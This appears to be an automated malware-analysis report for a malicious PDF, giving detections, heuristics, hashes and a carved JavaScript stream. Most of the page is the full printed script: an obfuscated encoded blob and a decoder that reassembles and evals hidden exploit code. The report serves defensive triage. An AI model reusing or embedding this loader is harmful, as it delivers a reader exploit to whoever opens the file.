Malicious PDF — malware analysis report

Static analysis result for SHA-256 aa825d6f6b80fe5d…

MALICIOUS

PDF

6.9 KB · Created: 2008-31-20 53:85:00 (as recorded in the document metadata; this is not a valid calendar timestamp, so the creation date should not be relied on) · Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) · First seen: 2012-07-12
MD5: f03b5bc2189f925cbcb5f596b89695d7 SHA-1: fdbcdb7ecae4cb0ff223dbf6c24425d11a0c5a34 SHA-256: aa825d6f6b80fe5d42651a4c9af2180219bd4dd33642353cd039f7e9ede6032f
286 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell; T1059.007 JavaScript (of the two, only the JavaScript technique is evidenced by the findings listed on this page)

The PDF file was flagged as malicious by ClamAV with the signature Pdf.Exploit.Agent-35587. Static analysis revealed embedded JavaScript with multiple obfuscated eval() calls, indicating an attempt to conceal the code that is ultimately executed. The ML classifier also strongly indicated maliciousness. The primary attack pattern is exploitation of vulnerabilities in the PDF reader through the embedded JavaScript.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 5

  • ClamAV: Pdf.Exploit.Agent-35587 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35587
  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8 …
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x3D5 5387 bytes
SHA-256: cee0c0a6a9408ac56e453f1d6b3cfeb120507921f4b0a05ddea8e9a718d68bdf
Detection
ClamAV: Pdf.Exploit.Agent-35587
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). 125 of 191 identifiers look randomly generated (e.g. 'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'); 2 string-concatenation chain(s) — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
var datf = 'qT'+'n'+'fZ1KM7Zoqhl'+'zu'+'f6n'+'fl8P0ah'+'28P0Eg8Lg8P0Eg'+'8Lg8P0'+'E'+'g'+'8Lg8P'+'8dC'+'z'+'GK8P6EgPhK8PCd2R'+'Zg8PVlgWZg8PVlg2'+'gg8PT5CyLg8PT5g8L'+'g8PT5q52K'+'8P'+'Tuy2lg8P'+'C5'+'Cz6K8P'+'C5C5CK8PVdq'+'@qK8P'+'05C8lK8PT5CzCK'+'8P'+'Cl'+'2z'+'CK8PTo'+'gdC'+'K8PZdCKfg'+'8P0dg56'+'g8P'+'ZdCKf'+'g8'+'P'+'CgCza'+'g8PT5C2Lg8PT5CzGK'+'8PCl2z'+'CK8PGKy2Lg8PCgg6O'+'g8PT'+'Kgd2g8'+'P8E22Lg'+'8'+'PT'+'5'+'Cggg8PT5CzCK8P2Kq'+'Kqg8PG'+'KyzG'+'K8PaE26Og8PCg2g'+'gg'+'8P8E2'+'z2g8P'+'T5CgqK8PT5CzCK8P2KqKqg8'+'P'+'G'+'Ky'+'zag8P6Kq6Og8P2'+'lgPq'+'K8P'+'8E2v'+'fK8PT5C2fK8PT5C'+'z'+'CK8P2'+'Kq'+'Kq'+'g8PGKyz6g8P8lg6Og8P8dCvgg8P8E26qK8'+'P'+'T5C'+'yhK8PT5CzCK8P2KqKqg8PGK'+'y5C'+'K8PGgC6O'+'g'+'8P8'+'gqLqg8P8E2POg8PT5CvE'+'g8PT5CzC'+'K8P2K'+'qKqg8P25'+'C5GK8P0'+'o2KqK8PZgqvLK'+'8'+'PCd'+'2glg8'+'PCo2d2K8PTuy2qg8PT'+'5CzT'+'K8PGKg'+'zCK8PZgqKqg'+'8'+'PC'+'l'+'2R'+'GK8PT'+'5q'+'d2K8PTK'+'C6lg'+'8PCl2WCg8PCo2W2K8'+'P'+'8E2WZg8'+'PT5CK'+'fg8PT'+'5CzCK8PVE2WCK8'+'P'+'CK21Zg8P'+'ZdCR8'+'g8Paly'+'2Og8PT5C'+'zCK8PC'+'d2zCK8PCo'+'g'+'d2'+'K8P'+'GgqKfg8PGdCKLK8PCd'+'2WCK8P'+'65'+'Cd'+'2'+'K8P2lg6Og8PT5CzC'+'K8'+'PG5CzCK8P2'+'Kq'+'Kfg8PVg2'+'5GK8P'+'G52z0K8PG'+'KqKfg8P8E2'+'5a'+'g8PT5C6'+'lK8PT5'+'CzC'+'K8P2Kqz6K8PGlyRCK8PGogzCK8P'+'6Kg'+'Lgg8PGly6'+'g'+'K'+'8PT5qdCK8PVgqLOg8PT5CzC'+'K8'+'PZgqgPg8PC'+'l2RCK8PTogd2K8P'+'T'+'KC6lg8PCl2WC'+'g8PCo2W2K8P25'+'C2Og8PT5CzCK8PVg2'+'z'+'CK8PGo'+'2zVg8P2Kqz6K8P0oqRGK8PGoqyfg8P2l'+'gW6K8P65CLgK8PGoqWCK8P2'+'KqKfg8P'+'Vg256g8P'+'G52z'+'2K8PGK'+'qK'+'fg8P8E25ag8PT5CR6K'+'8PT5CzCK8PT5C6lg8P'+'Zg'+'qgPg'+'8PCl2RCK8P'+'To2'+'d2K8PTuC6'+'lg8PCl2WCg8PCo2W2K8PC5C2Og8PT5CzCK8PVg2'+'zCK'+'8P'+'Cl'+'2gPg8P'+'C5Cd2'+'K8PT'+'KC6lg8'+'PCl2W'+'Cg8PC'+'o2W2K8'+'PT5C'+'2Og8P'+'T5Cz'+'CK8P2'+'KCzCK'+'8PGu'+'CW0g8P'+'8'+'gCz'+'6K8P8'+'gCz6K8'+'P8'+'gCz6K'+'8'+'P8gCz6K'+'8P8Eg'+'KLK8PGK2zGK8PCl2W6K'+'8P8lCylg8PGuCgng8P8dCgPg8PCl2W2'+'K8PCl2'+'2Lg8PTo2'+'Lhg8PG5gKfg8P'+'GKyz6g'+'8PZEqKf'+'g'+'8P'+'Cl216g8PCKgL'+'hK8P'+'To'+'qLOg'+'8PGKygLK8PZgyKfg8PTo'+'qRC'+'
K'+'8P0oqgLK'+'8P252vqg8P0dgdTK'+'8PGEqz6K8'+'P0oqWZg8P'+'TuggEg8P'+'C5CPgg8'+'P'+'2'+'lC1Tg8PTo2L'+'hK8P'+'Gggvl'+'K8PToqzGg8P2'+'5'+'CgfK'+'8P2gC'+'2fg8P2gg10'+'g'+'8PZg'+'q'+'W2g8PGK22gK8P8l2Kfg8PGK'+'2K'+'fg8PTo'+'qRGK8PV'+'gyy'+'hg8'+'PTogK'+'fg'+'8PCl2d0g'+'8PCogW'+'T'+'g8P6'+'dgz6K8PT5qKfg'+'8PTo'+'qK'+'fg8PG'+'Kgvg'+'K8PGl'+'C'+'WGg8PT5Czag8P2dq2Og8P2lgggg8PG'+'Kq'+'gPg8P2ogW0K8P2ugdGg8PT'+'5Cd2g8Pal2K'+'ng8Palg'+'@fg8PGdCygK8PCEgvqK8PCgyKLK8PCgCKl'+'g8PC'+'g2@fg8P'+'GgC@Lg8P'+'Cg2'+'@Og8'+'PCEgKhg8PClCKq'+'K8PCEgvlK8'+'PC'+'lCKq'+'K8PCl'+'CvlK8PGdC@'+'n'+'g8PCdCKng8'+'Pal2@L'+'g8'+'PC'+'ggvqK8P'+'C'+'lCKfg8PC'+'gCKEg8PCE2vqK8PCd'+'CKlg8PCg2@'+'Lg8Pad2@hg8PCEgK'+'Eg'+'8PaEg'+'K'+'lg'+'8'+'PCEq'+'vqK8PC'+'g'+'gKq'+'K8PC'+'gyKfg8PCE2K'+'lK8'+'PalgvlK8PalgKng8PC'+'gyyqK8P6lCKfg8P6lgygg8'+'PaEgvqg8PCEq@Pg8P6'+'d'+'2yfK8P8l'+'gyEdPOUd'+'TlG'+'fPv2z'+'f09KvPS80y'+'68f2T0'+'@Bl2T2gug'+'dT'+'2T2gugdG2@mqPfv824vr@qQZoFDV0OhhlgmqPfv8TCn11lz8fMg63gMX'+'g4vr@'+'qQZoFD'+'V0O4d'+'8Ts8MA'+'Oc@FRSTufSV08'+'VVy@'+'V8MCT'+'0@v2zf'+'095KCT1uM'+'0fMGfK'+'aCGPC2V8lw6E0OhPlB0VF4ddlgG'+'0'+'0x9dT'+'l'+'GfPFT0gLU1F2qgvv2zf095Ky'+'Tzfy'+'0zlOSV0aPlK1TM'+'uvTu'+'la2nOyO8@mqPfv8Za@PdgS6Q4PGulySKvv2zf'+'095'+'KyTzfy0z'+'lO'+'S'+'V0aPlKv2'+'zf095K'+'CT1uM0fMqfKaC'+'GPC2V8lw'+'6'+'E0OU'+'ET'+'aZ0ufVZa@Pd'+'gS6Q'+'4PGul'+'yS5KCT1uM0fM'+'4f'+'K'+'a'+'CGPC'+'2V8l'+'w6'+'E0GPl'+'sKPlg'+'2Pg@3algv'+'zoO'+'7'+'Tzq26z'+'AhO322hl'+'A'+'wc@TW8nlb9Za@Pdg'+'S6'+'Q'+'4PGuly'+'So@FT'+'0gLU1'+'F2qEyK21lT'+'fKuSZ@FW0lFu0E'+'gvn5fh_8'+'0@'+'82'+'qvGPfLV'+'2@mqVuvVZOo'+'65lV90uF91fKCdghPEywC3qv0'+'3'+'MCeVM'+'BCz2vzggvPlgmLQaRG'+'fa41V'+'u4G1TKhE@4EZs1X'+'0AUZ5q8n'+'508Ldge'+'GV4w'+'C3qv03MCeVMBCz2vd@v'+'3al'+'gv'+'zoO7Tz'+'q'+'2'+'6z'+'A4d8Ts8'+'MAOc'+'@FRXzT'+'lGf'+'P0CKCIZ@vg'+'hgyLEgyLE'+'gyLEg'+'yLEgyLEgyLE'+'ly'+'6nly6nly6nly6nly6nly6nly6nly6nl'+'y6nly6nly6'+'nly6n'+'ly6nl'+'y6nly6nly6nly6nly6nly6nly6nly6nly6'+'nly6nly6nly6nly'+'6nl'+'y6nly6nl'+'y6n'+'ly6nly'+'6nly6nly6nl'+'y6nly6nly6nly6nly6nly6n'
+'ly6nly6nly'+'6'+'n'+'ly'+'6n'+'ly6'+'nly6n'+'ly'+'6nly6nly6nly6n'+'ly6nly6nl'+'y6nl'+'y6nly6nl'+'y'+'6nl'+'y6nly6nly'+'6nly6nly6nly6'+'nl'+'y6nly6nly6'+'nly6nly6nly6nly'+'6nly6nly6nly6nly'+'6nly6nly'+'6nly6'+'nly6nly6nly6n'+'l'+'y6nly6n'+'ly6'+'nly6nly6nly'+'6n'+'ly6nly6nly6nly6nly6n'+'ly6n'+'ly6nly6nEyP0PMCSTlv'+'Z'+'1u8C0@BlT2PPlg2q1PCf1CzcK4OUE'; function x5mzpznBG(xgFyQhq){ var tp = '63@31@43@12@48@29@35@1@47@3@0@0@0@0@0@0@44@53@57@55@20@10@52@39@18@17@9@45@34@60@37@50@46@28@24@23@59@2@15@25@27@49@11@0@0@0@0@22@0@51@21@7@26@19@62@42@38@0@4@36@58@32@14@13@33@54@6@56@5@61@41@8@16@40@30'; var nInuGccDPx=0, eiPeTEP60U7W6=xgFyQhq.length, qsaPrNb8Kn=1024, pmFIcCBKcq, eFt1kzWpa8iAW, Q8itvWUhmm='', wxeaoSR4LRoLye=nInuGccDPx, iM7cx=nInuGccDPx, SfYfB3Nyphwn=nInuGccDPx, Gbozf0QTUP=Array(); Gbozf0QTUP = eval("tp"+".s"+"pl"+"it"+"('@')"); for(eval('eFt1kzWpa8iAW=Ma'+'th.'+'ce'+'il(eiPeTEP60U7W6'+'/qsaPrNb8Kn)');eFt1kzWpa8iAW>nInuGccDPx;eFt1kzWpa8iAW--){ for(eval('pmFIcCBKcq=M'+'ath'+'.m'+'in(eiPeTEP60U7W6,'+'qsaPrNb8Kn)');pmFIcCBKcq>nInuGccDPx;pmFIcCBKcq--,eiPeTEP60U7W6--){ eval('SfYfB3Nyphwn|'+'=(Gbozf0QTUP['+'xgFyQhq.'+'cha'+'rCo'+'de'+'At(wxeaoSR4LRoLye+'+'+)-48])<'+'<iM7cx'); if(iM7cx){ eval('Q8itvWUhmm+'+'=S'+'tri'+'ng['+'"fro'+'mCha'+'rCod'+'e"](155^'+'SfYfB3Nyphwn&'+'25'+'5)'); SfYfB3Nyphwn>>=8; iM7cx-=2; } else { iM7cx=6; } } } eval(Q8itvWUhmm); } x5mzpznBG(datf);